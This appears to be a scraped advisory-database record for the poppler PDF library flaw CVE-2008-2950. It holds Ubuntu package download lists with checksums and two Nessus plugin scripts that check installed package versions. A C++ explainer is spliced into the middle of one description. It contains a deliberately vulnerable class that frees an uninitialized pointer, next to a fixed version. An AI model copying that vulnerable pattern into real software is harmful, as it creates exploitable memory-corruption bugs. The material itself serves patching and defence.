\r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 151646 
34078b6f1c7dd03b09a9d49c5c781ca9\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 100312 46c34f9b71c0d04b03326f73015db564\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 77740 08b6929b3048c39df47a9502bafc31d7\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 72662 2d208d0aa2e6fcc41a4124f5b1d7db2c\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 195288 2031b4483879873311a73cbfdf729a28\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 224464 c490f31e6a07a46edc5e1ebb9701c221\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 677306 8642fd84565922b7634352db04243c32\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 121850 8182b5f099f787d9ed4442bf7872bb30\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 1002844 04578e12f116e510b24b9e0d2d8ee090\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 164740 4d691d9ec4ad1087165cf11fd8e5d264\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 107298 cd6acf76d851f30182bdb1fa05bfcbc3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 80398 81f8a5a2c956e6f828ae5cb2f9f17490\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 76332 7dc41341770257d938649c48e3d7e9fa\r\n 
\r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 199780 6a302f61dbf30c67d98090d7d25a0dbd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 237526 b1e2c21d1488139dced83c244a497398\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 732008 82591a4bd63db01bc91975509deb2f49\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 141004 22878d01b622f6032c912b215e1606c0\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 909134 c7e4204e37f323af35fdbc1d097180e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 152728 07fc3f3bb10bb36a870253cd3f79a758\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 99818 70fba1d4419ceae5c1b478119e04850f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 76632 99dd6ddc6d32465402f7bf37f9308357\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 71458 18ccafdfb4dfbea92ea58264845f3e3b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 191570 673fa1300b3bc5127149e345e17751da\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 226710 ae220abf8c8286b532b00b65b4c9a758\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 674798 5ac9f44a610b2ff43678dec030b9eaf2\r\n 
\r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 120646 ef903a0096285b7f8787ef14c43374cc\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4-1ubuntu3.1.diff.gz\r\n Size/MD5: 11034 801fe768d34b19c5fb5d8d876a4b4ebf\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4-1ubuntu3.1.dsc\r\n Size/MD5: 1221 35bf3e37bcc90b9b039a173ca6a5731f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4.orig.tar.gz\r\n Size/MD5: 1294481 13d12ca4e349574cfbbcf4a9b2b3ae52\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 892090 553ff6c4f74074e995de1c4ceadc4374\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 109066 9ac88a1bd737100d2e4dddcb4b4e9d03\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 54810 3a2895f4bfa4cb8be250ba29c98cea58\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 45366 8b8d9c43295b713f015973ae57701381\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 25526 ef379832248c2821003140c48822db9f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 146692 9e77fd6a5ef457923bd773e99b6f4386\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 200584 942ec772345a806de5d6d61e5efe5549\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 644846 
236a0a4d87e441b5dd8eec894d7cc208\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 79032 3f2b6ea555e027cef9f14e7a1d46ff76\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 836578 16f0cc8ae631624d14091e8853422114\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 102824 179595cf6458285e1a2fd362ed3e9341\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 52320 6d4ed78b515b5447260fcff6abe5362a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 41766 0e530837303727f8e6be6fd40d0ac78c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 25050 ebbdc3024c22581647aa90d53ef0136c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 143516 ca365941effdd98ea84329b2b5581f3c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 189228 fc01186e6e77e1882f78de493159b36f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 619600 d127d527e35d947bc24c7db58d865190\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 73694 96f3e39b06f9387cc92bc46444c24639\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 856586 cca2260367e4d36a776d059df1b2db57\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 103760 
d38e753b633b9c2a1a63b06459f34099\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 52558 0a8f18c8ee8eb5502bd58000f975f262\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 42182 1d10efadc4695ebbd4ff88123d17df98\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 24804 f7040efc7342bcd8e1b200a74a5590e5\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 145074 387ed2c8f6940de89545f0c96adc606f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 190472 30b8d7f1fbdb8860a24cc71c66b60aca\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 632768 cd3bf5d700c013b250d612c1d1db5a11\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 74714 2129c0ed204b2ae04bbea1a70ab43992\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 955022 26ad8c76aa7d6d5baffacb0acb3565a3\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 115788 a0ad5fd01421395daf4664dc00586635\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 58450 a52e1f514efcbcf4ce0fe347e8c3caf3\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 45298 f2f0cf3f252ce7f60876c3ec848bd885\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 28864 6cf7cf00fed312d436163580434a6d21\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 
152688 108505a8f59556e0a7ef86a6e69853d7\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 208608 77e7c025d9a6dbb7bf83586c31c94c29\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 681084 8eb4095778c5696983030cb3c9398527\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 94436 0cb05fa30a9f0d5beb1c04921b1b1829\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 857552 38149e8ecc431ca392e1d9554835860f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 104088 8ac009e507e678c542d5fc099b9d847f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 51390 e2d53e2d16e5b6d9157599e0d42e459e\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 41170 552e12af1774ae3d3eff64869cf2d692\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 23902 863c7c02aef704172afa53cd3f8568c5\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 145338 7b42f4a00d1bf8beb99dabd7eb2424cf\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 192370 0b530b09e35e68a135c88cc416c81eaf\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 628426 0a8aaa072e34985b91102732443e29d8\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 72988 28ca78924531b76c5c32e5da8895492a\r\n", "modified": "2008-07-30T00:00:00", "published": "2008-07-30T00:00:00", "id": "SECURITYVULNS:DOC:20247", 
"href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20247", "title": "[USN-631-1] poppler vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:15", "bulletinFamily": "unix", "description": "Felipe Andres Manzano discovered that poppler did not correctly initialize certain page widgets. If a user were tricked into viewing a malicious PDF file, a remote attacker could exploit this to crash applications linked against poppler, leading to a denial of service.", "modified": "2008-07-28T00:00:00", "published": "2008-07-28T00:00:00", "id": "USN-631-1", "href": "https://usn.ubuntu.com/631-1/", "title": "poppler vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:11:07", "bulletinFamily": "scanner", "description": "Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 - use of an uninitialized pointer to call free() in Page::~Page (#454277) http://www.ocert.org/advisories/ocert-2008-007.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
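The bug these advisories describe, an owning pointer that the constructor only assigns late and that the destructor deletes unconditionally, reduced to a self-contained C++ model. This is an added example and not poppler's own code: `PageDict`, `FormPageWidgets` and the two `Page` classes are simplified stand-ins whose names and fields are assumptions, chosen only to mirror the shape of `Page::Page` bailing out on malformed input before `pageWidgets` is set and `Page::~Page` then freeing it. The vulnerable class is shown beside the hardened one; only the hardened one is exercised, because destroying the vulnerable one on its early-return path is undefined behaviour.

```cpp
#include <cstddef>
#include <cstdio>

// Simplified stand-ins for the poppler types involved (assumed names and
// fields; an illustration, not poppler's code).
struct PageDict {
    bool annotsOk;   // does the page's /Annots entry parse?
    bool hasForm;    // does the document carry an AcroForm?
};

struct FormPageWidgets {
    static int liveCount;                 // instances alive, checked by the test
    FormPageWidgets()  { ++liveCount; }
    ~FormPageWidgets() { --liveCount; }
};
int FormPageWidgets::liveCount = 0;

// Vulnerable shape (the CVE-2008-2950 pattern): pageWidgets is assigned only
// at the end of the constructor, but malformed input makes the constructor
// return before that point. The member then holds whatever bytes the
// allocator left in the slot, and the destructor hands that value to delete.
// Not instantiated below: destroying it on the early-return path is
// undefined behaviour.
class PageVulnerable {
public:
    explicit PageVulnerable(const PageDict &d) {
        ok = true;
        if (!d.annotsOk) { ok = false; return; }          // pageWidgets never set
        pageWidgets = d.hasForm ? new FormPageWidgets() : NULL;
    }
    ~PageVulnerable() { delete pageWidgets; }             // uninitialized on the early path
    PageVulnerable(const PageVulnerable &) = delete;
    PageVulnerable &operator=(const PageVulnerable &) = delete;
    bool ok;
private:
    FormPageWidgets *pageWidgets;
};

// Hardened shape: every owning pointer is set in the initializer list, so the
// destructor's delete is a no-op on every path that did not allocate.
class PageFixed {
public:
    explicit PageFixed(const PageDict &d) : ok(true), pageWidgets(NULL) {
        if (!d.annotsOk) { ok = false; return; }          // safe: pageWidgets == NULL
        pageWidgets = d.hasForm ? new FormPageWidgets() : NULL;
    }
    ~PageFixed() { delete pageWidgets; }                  // delete NULL is defined and harmless
    PageFixed(const PageFixed &) = delete;
    PageFixed &operator=(const PageFixed &) = delete;
    bool isOk() const { return ok; }
    bool hasWidgets() const { return pageWidgets != NULL; }
private:
    bool ok;
    FormPageWidgets *pageWidgets;
};

// Build a page from a dict and tear it down again. Returns true when no
// FormPageWidgets leaked or was destroyed twice; *okOut receives the
// constructor's ok flag and *hadWidgets whether a widgets object existed.
bool constructAndDestroy(const PageDict &d, bool *okOut, bool *hadWidgets) {
    int before = FormPageWidgets::liveCount;
    {
        PageFixed p(d);
        *okOut = p.isOk();
        *hadWidgets = p.hasWidgets();
    }
    return FormPageWidgets::liveCount == before;
}

int main() {
    // Constructed inputs: the first mirrors the "Page annotations object ...
    // is wrong type (integer)" page from the crash log above.
    PageDict cases[] = {
        { false, true  },   // malformed /Annots in a document with an AcroForm
        { true,  true  },   // well-formed page, AcroForm present
        { true,  false },   // well-formed page, no form
    };
    for (const PageDict &d : cases) {
        bool ok = false, widgets = false;
        bool clean = constructAndDestroy(d, &ok, &widgets);
        std::printf("annotsOk=%d hasForm=%d -> ok=%d widgets=%d clean=%d\n",
                    d.annotsOk, d.hasForm, ok, widgets, clean);
    }
    return 0;
}
```

All three cases come back clean with the hardened class. To observe the vulnerable shape, instantiate `PageVulnerable` with the first case under Valgrind's memcheck or MemorySanitizer, which report the use of the uninitialized value itself; that is a more reliable signal than waiting for a crash, because a slot that happens to contain zero (or, as the crash log above notes, a stale but still valid heap pointer) makes the bug pass silently or fail only intermittently.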
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2008-7104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33847", "published": "2008-08-08T00:00:00", "title": "Fedora 8 : poppler-0.6.2-2.fc8 (2008-7104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-7104.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33847);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/12/24 10:14:26\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_bugtraq_id(30107);\n script_xref(name:\"FEDORA\", value:\"2008-7104\");\n\n script_name(english:\"Fedora 8 : poppler-0.6.2-2.fc8 (2008-7104)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 -\nuse of an uninitialized pointer to call free() in Page::~Page\n(#454277) http://www.ocert.org/advisories/ocert-2008-007.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ocert.org/advisories/ocert-2008-007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ocert.org/advisories/ocert-2008-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=454277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-August/013410.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?31a04841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected poppler package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"poppler-0.6.2-2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:56", "bulletinFamily": "scanner", "description": "This update fixes an code execution bug. 
(CVE-2008-2950)", "modified": "2014-06-13T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_0_LIBPOPPLER-DEVEL-080703.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40041", "title": "openSUSE Security Update : libpoppler-devel (libpoppler-devel-77)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libpoppler-devel-77.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40041);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:44:02 $\");\n\n script_cve_id(\"CVE-2008-2950\");\n\n script_name(english:\"openSUSE Security Update : libpoppler-devel (libpoppler-devel-77)\");\n script_summary(english:\"Check for the libpoppler-devel-77 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes an code execution bug. 
(CVE-2008-2950)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=404955\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpoppler-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-glib3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt4-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:poppler-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 
